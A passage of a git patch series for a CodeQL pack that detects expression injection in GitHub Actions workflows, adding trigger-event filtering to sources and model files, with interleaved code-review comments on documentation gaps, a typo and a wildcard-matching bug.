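Review bot: `abstract string getATriggerEvent();` added to `RemoteFlowSource` has no QLDoc, unlike the neighbouring `getSourceType()`, although it is a new obligation on every subclass and the value `CriticalExpressionInjection.ql` feeds into `hasTriggerEvent`. Suggest `/** Gets a workflow trigger event (an \`on:\` key) under which this source is attacker-controlled. May have several results; \`"*"\` is used by sources not tied to a specific event. */`. In the ExternalFlow.qll hunk the new `trigger` parameter of `externallyDefinedSource` is likewise undocumented and the predicate itself carries no QLDoc; its body continues past the hunk.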
@@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** 
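Review bot: The new context-to-trigger table inside `EventSource()` carries no comment, and the absence of `pull_request` from the `isExternalUserControlledPullRequest` list while `pull_request_target` is present is exactly what the next maintainer will read as an omission; a line above the disjunction such as `// Triggers under which each context is attacker-controlled; pull_request is left out on purpose — document why` would pin the intent. Note also that `issue_comment`, `discussion_comment` and `pull_request_review_comment` each appear in two lists, so a single source node can report several triggers through `getATriggerEvent()`; that is fine for `hasTriggerEvent` but worth stating where the predicate is documented.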
@@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189a..ae99e7c91849 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -201,7 +201,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) 
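Review bot: The two DataFlowPrivate.qll hunks move `stepsCtxLocalStep` and `envCtxLocalStep` to the four-argument `externallyDefinedSource(..., _)`, but this file's pre-image index is `89f31983189a`, the same one that [PATCH 060/707] rewrote to add `needsCtxLocalStep`, which calls the old three-argument form; if both patches land, that predicate will not compile until it becomes `externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _)`. Passing `_` for the trigger in these local steps also means a model row's trigger is ignored at step level and only enforced by the consuming query; a comment on each, `// trigger is enforced by the query via getATriggerEvent(), not here`, would stop someone "fixing" it later.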
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26db..34cb56a01ad4 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826c..6fefec9a4f8f 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5e..d7cbde25b88f 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml 
@@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 000000000000..20383f415c28 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea9..21a0b479ef55 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
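Review bot: The fifth column of the last data row reads `Branch tirggering workflow run`; since that column is what `getSourceType()` surfaces to users, it should be `Branch triggering workflow run`. The new file also ends with a stray blank line after the last row.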
@@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", 
"output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e1..9b6649892afa 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml 
@@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45cb..a6baf060c9d8 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From 3aa4f7f1afc911f7ef871d2b3d22daea7ae2ac41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 063/707] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263b..5037a55d6329 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
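Review bot: `hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())` now filters on the source's own trigger, but `CompositeActionInputSource.getATriggerEvent()` returns `"*"` and the `TEST-RW-MODELS.model.yml` source row uses `"*"` as well, while `hasTriggerEvent` looks the string up as a literal `on:` key, so `"*"` never matches and those sources are silently excluded from the critical query. Either treat it as a wildcard, `predicate hasTriggerEvent(string trigger) { trigger = "*" or exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) }`, or document on `getATriggerEvent()` that `"*"` sources are intentionally out of scope here. Composite-action files have no enclosing workflow in any case, so that subclass may be moot, but the MaD rows are not.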
@@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } 
@@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 000000000000..624bd32e45cb --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -0,0 +1,47 @@
+/**
+ * @name Expression injection in Actions
+ * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious
+ * user to inject code into the GitHub action.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/critical-expression-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class ExpressionInjectionSink extends DataFlow::Node {
+ ExpressionInjectionSink() {
+ exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or
+ externallyDefinedSink(this, "expression-injection")
+ }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where
+ MyFlow::flowPath(source, sink) and
+ source
+ .getNode()
+ .asExpr()
+ .(Statement)
+ .getEnclosingWorkflowStmt()
+ .hasTriggerEvent("pull_request_target")
+select sink.getNode(), source, sink,
+ "Potential expression injection, which may be controlled by an external user."
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 99779d6cc907..c34fcb74bbc0 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -4,7 +4,7 @@
 * user to inject code into the GitHub action.
 * @kind path-problem
 * @problem.severity warning
- * @security-severity 9.3
+ * @security-severity 5.0
 * @precision high
 * @id actions/expression-injection
 * @tags actions
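Review bot: The `where` clause hard-codes `"pull_request_target"`, so a source that is attacker-controlled only under another event (the `issue_comment`, `workflow_run` or `discussion` contexts modelled in FlowSources.qll) is never reported, while every source in a `pull_request_target` workflow is reported even if that event does not populate it. Deriving the event from the source, `.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())`, needs the source classes to expose their trigger. The `.(Statement)` cast also deserves a test with an event-context source rather than only the changed-files model: if `ExprAccessExpr` nodes are not statements, the cast drops every `EventSource` silently. `MyConfig`/`MyFlow` are placeholder names; `ExpressionInjectionConfig`/`ExpressionInjectionFlow` would match the sink class.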
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml
index b40f5eb6ac05..8271f93d857f 100644
--- a/ql/src/test/.github/workflows/simple2.yml
+++ b/ql/src/test/.github/workflows/simple2.yml
@@ -1,9 +1,6 @@
 name: CI
-on:
- pull_request:
- branches:
- - main
+on: [pull_request_target, pull_request]
 jobs:
 changed_files:
From ea29a09fd7ea8ccc8a1c87e7b5914a54333312eb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 21 Feb 2024 10:23:37 +0100
Subject: [PATCH 064/707] feat(triggers): New query for critical issues
Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable.
---
 ql/lib/codeql/actions/Ast.qll | 4 +-
 .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++-
 .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++-----
 .../dataflow/internal/DataFlowPrivate.qll | 4 +-
 ...ahmadnassri_action-changed-files.model.yml | 2 -
 ql/lib/ext/dorny_paths-filter.model.yml | 1 -
 .../ext/jitterbit_get-changed-files.model.yml | 7 ----
 ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++
 ql/lib/ext/tj-actions_changed-files.model.yml | 17 ---------
 .../tj-actions_verify-changed-files.model.yml | 1 -
 .../CWE-094/CriticalExpressionInjection.ql | 2 +-
 11 files changed, 50 insertions(+), 43 deletions(-)
 create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 5037a55d6329..2e93187b6bf0 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -22,7 +22,9 @@ class AstNode instanceof YamlNode {
 */
 class Statement extends AstNode {
 /** Gets the workflow that this job is a part of. */
- WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) }
+ WorkflowStmt getEnclosingWorkflowStmt() {
+ exists(WorkflowStmt w | w.getAChildNode*() = this and result = w)
+ }
 }
 /**
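Review bot: The QLDoc kept above the rewritten predicate still reads "Gets the workflow that this job is a part of."; it was copied from `JobStmt` and now sits on `Statement`, so `/** Gets the workflow that this statement is a part of, if any. */` is the accurate wording. The "if any" matters: a statement inside a composite action presumably has no enclosing `WorkflowStmt`, and callers such as CriticalExpressionInjection.ql then drop those sources without any diagnostic, which is worth stating in the doc so the next query author knows to handle that case.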
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 6446fbb55728..594b6017729e 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) {
 Extensions::sinkModel(action, version, input, kind)
 }
-predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
- exists(UsesExpr uses, string action, string version, string trigger, string kind |
+predicate externallyDefinedSource(
+ DataFlow::Node source, string sourceType, string fieldName, string trigger
+) {
+ exists(UsesExpr uses, string action, string version, string kind |
 sourceModel(action, version, fieldName, trigger, kind) and
 uses.getCallee() = action.toLowerCase() and
 (
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 09094f2c580c..0e82498bfc15 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode {
 /** Gets a string that describes the type of this remote flow source. */
 abstract string getSourceType();
+ abstract string getATriggerEvent();
+
 override string getThreatModel() { result = "remote" }
 }
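Review bot: The new `trigger` parameter of `externallyDefinedSource` is undocumented, and the FlowSources.qll hunk in the same line adds `abstract string getATriggerEvent();` without the QLDoc that `getSourceType()` directly above it carries. On the predicate, a QLDoc sentence should say that `trigger` is the event column of the `sourceModel` row and is matched literally (nothing here expands a wildcard), so it only lines up with `hasTriggerEvent` when the row names a key that can appear under `on:`. On the abstract member, `/** Gets a trigger event under which this source carries externally controlled data. */` would do. The `exists` body of `externallyDefinedSource` continues past the end of the hunk.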
@@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) {
 }
 private class EventSource extends RemoteFlowSource {
+ string trigger;
+
 EventSource() {
 exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() |
- isExternalUserControlledIssue(context) or
- isExternalUserControlledPullRequest(context) or
- isExternalUserControlledReview(context) or
- isExternalUserControlledComment(context) or
- isExternalUserControlledGollum(context) or
- isExternalUserControlledCommit(context) or
- isExternalUserControlledDiscussion(context) or
- isExternalUserControlledWorkflowRun(context)
+ trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context)
+ or
+ trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and
+ isExternalUserControlledPullRequest(context)
+ or
+ trigger = ["pull_request_review"] and isExternalUserControlledReview(context)
+ or
+ trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and
+ isExternalUserControlledComment(context)
+ or
+ trigger = ["gollum"] and isExternalUserControlledGollum(context)
+ or
+ trigger = ["push"] and isExternalUserControlledCommit(context)
+ or
+ trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context)
+ or
+ trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context)
 )
 }
 override string getSourceType() { result = "User-controlled events" }
+
+ override string getATriggerEvent() { result = trigger }
 }
 /**
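Review bot: Nothing in the new `EventSource` body records why `pull_request` appears in none of the trigger lists while `pull_request_target` does, even though the model-file hunks of this commit strip every `pull_request` row for the same reason; a one-line comment above the disjunction, e.g. `// pull_request is left out on purpose: fork-originated runs get no secrets and a read-only token, so these contexts are not exploitable there`, would stop the next reader from adding it back. The singleton lists `["pull_request_review"]`, `["gollum"]`, `["push"]` and `["workflow_run"]` can be plain strings, e.g. `trigger = "push" and isExternalUserControlledCommit(context)`. A short QLDoc on the `trigger` field noting that it can hold several values for one source (each list element) would also explain the `getATriggerEvent` name.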
@@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource {
 */
 private class ExternallyDefinedSource extends RemoteFlowSource {
 string sourceType;
+ string trigger;
- ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) }
+ ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) }
 override string getSourceType() { result = sourceType }
+
+ override string getATriggerEvent() { result = trigger }
 }
 /**
@@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource {
 CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() }
 override string getSourceType() { result = "Composite action input" }
+
+ override string getATriggerEvent() { result = "*" }
 }
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index e1a3479cfc0e..2d77b3473480 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos =
 */
 predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) {
 exists(UsesExpr astFrom, StepsCtxAccessExpr astTo |
- externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and
+ externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and
 astFrom = nodeFrom.asExpr() and
 astTo = nodeTo.asExpr() and
 astTo.getRefExpr() = astFrom
@@ -218,7 +218,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) {
 astFrom = nodeFrom.asExpr() and
 astTo = nodeTo.asExpr() and
 (
- externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or
+ externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or
 astTo.getRefExpr() = astFrom
 )
 )
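Review bot: `override string getATriggerEvent() { result = "*" }` on `CompositeActionInputSource` is meant as a wildcard, but its consumer in this commit, `hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())` in CriticalExpressionInjection.ql, looks `"*"` up as a literal key under `on:`, so a composite-action input can never satisfy the check; and `getEnclosingWorkflowStmt()` presumably has no result for a statement inside a composite action, so these sources are dropped twice over rather than reported. Either give `hasTriggerEvent` an explicit wildcard branch (`trigger = "*" or exists(...)`) together with a way to reach the calling workflow, or document on this override that composite-action inputs are intentionally excluded from the trigger-aware query. The `ExternallyDefinedSource` hunk above is fine as far as it goes, but its `trigger` field likewise has no QLDoc saying it is taken verbatim from the model row.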
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index 8f449f6b26db..34cb56a01ad4 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -3,7 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"]
 - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"]
 - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 6ee41e93826c..6fefec9a4f8f 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,5 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"]
 - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index f19a2da37f5e..d7cbde25b88f 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,17 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"]
 - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"]
